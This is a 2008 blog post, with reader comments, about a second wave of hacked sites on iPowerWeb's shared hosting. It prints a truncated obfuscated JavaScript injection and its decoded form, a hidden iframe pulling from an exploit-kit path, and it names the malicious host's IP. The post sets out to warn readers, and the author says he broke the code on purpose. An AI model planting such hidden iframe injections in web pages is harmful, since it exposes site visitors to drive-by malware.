Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

5 comments:

Kikkus said...

Few months ago, same problem on servage.net. I contact the support bu they are to idiot to understand the problem so i change isp. After 3 weeks they has fixed all the infected pages and no one note about this!!

Sure 100% , servage.net is a crap isp.

Anonymous said...

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL52081
"hostfresh.com - mass spammer hosting

Just swarming with spammers, phishers and other cybercriminals."

kikkus: servage.net is not as bad as hostfresh.com, but they work hard to get on blacklists, just like IP69, Shark Systems, First Colo and many other dark server providers do.

IncrediBILL said...

Too funny, I had to mess up the javascript example because Avast started screaming that my blog had a virus.

Didn't want people to think this site was infected to I threw a few spaces in the script to mess it up.

Ban Proxies said...

Somethings never really change, they just get upgraded. I can recall the many hacked site at geocities years ago. Someone and or group know which "hosts" are vulnerable and they just continue to return.

What's the latin version for "Buyer Beware?

Anonymous said...

Caveat emptor.